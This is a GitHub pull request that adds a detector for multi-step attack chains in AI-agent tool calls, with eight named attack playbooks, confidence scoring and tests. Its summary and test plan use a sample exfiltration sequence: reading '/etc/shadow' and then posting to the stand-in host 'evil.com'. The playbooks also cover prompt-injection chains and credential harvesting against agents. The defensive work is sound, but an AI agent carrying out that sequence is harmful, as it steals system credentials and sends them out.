feat: multi-step attack-pattern detector with confidence scoring#5
Open
azizx4 wants to merge 1 commit into
Open
feat: multi-step attack-pattern detector with confidence scoring#5azizx4 wants to merge 1 commit into
azizx4 wants to merge 1 commit into
Conversation
Add a new `meta`-kind detector that identifies multi-step attack chains by tracking per-agent tool-call history and matching against known attack playbooks. Each match is scored using contextual signals (data sensitivity, destination trust, timing, upstream anomaly signals) to minimize false positives. 8 built-in attack patterns: - DATA_EXFIL (AAT-T5010): sensitive read → outbound send - CRED_HARVEST (AAT-T5011): credential discovery → exfiltration - PRIV_ESCALATION (AAT-T5012): recon → sensitive read → priv exec - PROMPT_INJECTION_CHAIN (AAT-T1001): context poison → exploit - DESTRUCTIVE_ACTION (AAT-T8004): recon → delete/drop/truncate - ENCODED_EXFIL (AAT-T9001): sensitive read → encode → send - SUPPLY_CHAIN (AAT-T1003): package install → execute - ARTIFACT_BACKDOOR (AAT-T6003): write backdoor file → execute Key features: - Confidence scoring (0-100) with configurable block/flag thresholds - Custom Rules API: addRule() / removeRule() / getRules() - PPM upstream integration: sequence_anomaly signals boost confidence - SlidingWindowStats integration: burst detection increases confidence - Environment-configurable via ATTACK_PATTERN_* env vars - Wired into /api/v1/check: critical detector signals block requests 77 new tests across 3 test files. All 558 project tests pass.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
1 participant
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
Adds a new
meta-kind detector (aegis.builtin.attack-pattern) that catches multi-step attack chains that existing single-step detectors miss. Each call is individually benign, but the sequence reveals the attack.Example:
read_file("/etc/shadow")→http_post("https://evil.com")— each step passes on its own, but together it's data exfiltration. This detector blocks it.What's new
8 built-in attack playbooks with confidence scoring (0–100):
DATA_EXFILCRED_HARVESTPRIV_ESCALATIONPROMPT_INJECTION_CHAINDESTRUCTIVE_ACTIONENCODED_EXFILSUPPLY_CHAINARTIFACT_BACKDOORConfidence scoring with contextual bonuses/penalties:
blockThreshold(default 70),flagThreshold(default 40)Custom Rules API:
addRule()/removeRule()/getRules()— tenants can define their own attack playbooks at runtimeWired into
/api/v1/check: DetectorRegistry now participates in the check decision pipeline. Critical detector signals block requests (Layer 4, after policy + anomaly + DSL).Environment-configurable:
ATTACK_PATTERN_ENABLED,ATTACK_PATTERN_BLOCK_THRESHOLD,ATTACK_PATTERN_FLAG_THRESHOLD,ATTACK_PATTERN_WINDOW_MSHow it differs from existing SEQUENCE_ANOMALY
Both are complementary — PPM surprise feeds into this detector's confidence as a bonus signal.
Files changed
detectors/built-in/attack-pattern-detector.ts__tests__/attack-pattern-detector.test.ts__tests__/attack-pattern-integration.test.ts__tests__/attack-pattern-vs-existing.test.tsdetectors/index.tsconfig.tsattackPatternconfig sectionserver.tsapi/check.tsTest plan
tsc --noEmit)read_file("/etc/shadow")→http_post("evil.com")returns"decision": "block"with reason"Multi-Step Data Exfiltration detected (confidence 90%)"read_file("report.pdf")→send_email("boss@company.internal")passes through as"allow"